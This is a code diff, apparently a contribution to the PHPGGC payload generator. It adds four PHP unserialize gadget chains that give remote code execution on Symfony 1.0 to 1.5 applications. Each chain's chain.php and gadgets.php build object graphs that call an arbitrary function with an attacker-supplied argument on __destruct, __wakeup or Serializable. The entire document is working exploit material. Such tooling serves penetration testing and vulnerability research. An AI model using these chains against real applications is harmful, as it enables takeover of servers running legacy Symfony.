Adding Symfony 1.0 to 1.5 RCE gadget chains

gadgetchains/Symfony/RCE/12/chain.php

@@ -0,0 +1,26 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.3.0 <= 1.5.13~17';
+    public static $vector = '__destruct';
+    public static $author = 'darkpills';
+    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method (not composer)';
+
+    public function generate(array $parameters)
+    {
+        $cacheKey = "1";
+        $keys = new \sfOutputEscaperArrayDecorator($parameters['function'], array($cacheKey => $parameters['parameter']));
+
+        // a rmdir($path . '/' $cacheKey) will be done by Swift_KeyCache_DiskKeyCache::clearAll() 
+        // so put something that will never exists to avoid issues
+        $path = "thispathshouldneverexists";
+        $cache = new \Swift_KeyCache_DiskKeyCache($keys, $path);
+
+        return $cache;
+    }
+
+
+}

gadgetchains/Symfony/RCE/12/gadgets.php

@@ -0,0 +1,25 @@
+<?php
+
+class Swift_KeyCache_DiskKeyCache
+{
+  private $_path;
+
+  private $_keys = array();
+
+  public function __construct($keys, $path) {
+    $this->_keys = $keys;
+    $this->_path = $path;
+  }
+}
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}

gadgetchains/Symfony/RCE/13/chain.php

@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = 'Serializable';
+    public static $author = 'darkpills';
+    public static $information = 'With sfDoctrinePlugin enabled';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+
+        $pager = new \sfDoctrinePager($escaper);
+
+        return $pager;
+    }
+}

gadgetchains/Symfony/RCE/13/gadgets.php

@@ -0,0 +1,32 @@
+<?php
+
+class sfDoctrinePager implements Serializable
+{
+  protected
+    $prop                 = null;
+
+  public function __construct($prop) {
+    $this->prop = $prop;
+  }
+
+  public function serialize()
+  {
+    return serialize($this->prop);
+  }
+
+  public function unserialize($serialized)
+  {
+  }
+}
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}

gadgetchains/Symfony/RCE/14/chain.php

@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE14 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperObjectDecorator($parameters['function'], new \sfCultureInfo($parameters['parameter']));
+
+        $date = new \PropelDateTime(null, $escaper);
+
+        return $date;
+    }
+}

gadgetchains/Symfony/RCE/14/gadgets.php

@@ -0,0 +1,42 @@
+<?php
+class PropelDateTime extends DateTime
+{
+  private $dateString;
+
+	private $tzString;
+
+  public function __construct($dateString, $tzString) {
+    $this->dateString = $dateString;
+    $this->tzString = $tzString;
+  }
+}
+
+
+class sfOutputEscaperObjectDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class sfCultureInfo
+{
+  protected $dataFileExt = '.dat';
+  protected $data = array();
+  protected $culture;
+  protected $dataDir;
+  protected $dataFiles = array();
+  protected $dateTimeFormat;
+  protected $numberFormat;
+  protected $properties = array();
+
+  public function __construct($culture) {
+    $this->culture = $culture;
+  }
+
+}

gadgetchains/Symfony/RCE/15/chain.php

@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.0.0 <= 1.1.9';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With Creole ORM';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+
+        $tableInfo = new \MySQLiTableInfo($escaper);
+
+        return $tableInfo;
+    }
+}

gadgetchains/Symfony/RCE/15/gadgets.php

@@ -0,0 +1,38 @@
+<?php
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class MySQLiTableInfo 
+{
+
+  protected $name;
+  protected $columns = array();
+  protected $foreignKeys = array();
+  protected $indexes = array();
+  protected $primaryKey;
+  protected $pkLoaded = false;
+  protected $fksLoaded = false;
+  protected $indexesLoaded = false;
+  protected $colsLoaded = false;
+  protected $vendorLoaded = false;
+  protected $vendorSpecificInfo = array();
+  protected $conn;
+  protected $database;
+  protected $dblink;
+  protected $dbname;
+
+  public function __construct($columns)
+  {
+    $this->columns = $columns;
+  }
+}